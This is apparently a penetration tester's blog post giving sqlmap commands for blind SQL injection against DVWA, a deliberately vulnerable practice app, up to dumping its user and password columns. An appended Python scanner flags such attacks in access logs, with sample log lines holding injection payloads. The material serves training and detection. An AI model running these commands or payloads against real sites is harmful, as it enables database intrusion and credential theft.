Blind SQL Injection on DVWA using SQLMap


Here is a video showing how to perform a blind SQL injection. The vulnerable application is called DVWA and can be downloaded from the following address: http://www.dvwa.co.uk/

The commands I have used can be found below this video:

sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" 
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" --dbs
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -D dvwa --tables
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -T users --columns
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -C user,password --dump
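
Seen from the server, runs like the ones above show up in the access log as many requests to the same page with a non-numeric `id`. The following is an added example, not part of the original post, that flags such clients. It assumes Apache combined log format; the log lines are constructed, and the function names and the threshold are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
NUMERIC = re.compile(r"[0-9]+")
TARGET_PATH = "/dvwa/vulnerabilities/sqli_blind/"  # path from the commands above

# Constructed sample log lines (assumed Apache combined format), not real traffic.
SAMPLE_LOG = """\
192.168.0.20 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
192.168.0.20 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
192.168.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4523 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20AND%204821%3D4821%23&Submit=Submit HTTP/1.1" 200 4523 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20AND%204821%3D9377%23&Submit=Submit HTTP/1.1" 404 4410 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.0.31 - - [01/Jan/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27&Submit=Submit HTTP/1.1" 404 4410 "-" "Mozilla/5.0"
192.168.0.31 - - [01/Jan/2024:10:01:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
192.168.0.31 - - [01/Jan/2024:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%201%3D2&Submit=Submit HTTP/1.1" 404 4410 "-" "Mozilla/5.0"
192.168.0.31 - - [01/Jan/2024:10:01:03 +0000] "GET /dvwa/login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
"""

def scan(log_text, path=TARGET_PATH):
    """Per-client counts of requests to `path` whose id is not a plain integer."""
    stats = defaultdict(lambda: {"requests": 0, "bad_id": 0, "sqlmap_ua": False})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, agent = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        entry = stats[client]
        entry["requests"] += 1
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        # The page takes a numeric user id; any other value is injected syntax or fuzzing.
        if any(not NUMERIC.fullmatch(v) for v in ids):
            entry["bad_id"] += 1
        # The User-Agent is client-controlled, so treat it as a hint, not proof.
        if agent.lower().startswith("sqlmap/"):
            entry["sqlmap_ua"] = True
    return dict(stats)

def suspects(log_text, min_bad_ids=3):
    """Clients with a sqlmap User-Agent or at least `min_bad_ids` non-numeric ids."""
    return sorted(c for c, s in scan(log_text).items()
                  if s["sqlmap_ua"] or s["bad_id"] >= min_bad_ids)

if __name__ == "__main__":
    for client in suspects(SAMPLE_LOG):
        print(client, scan(SAMPLE_LOG)[client])
```

Counting non-numeric `id` values catches the client that changed its User-Agent, which a User-Agent match alone would miss.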

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]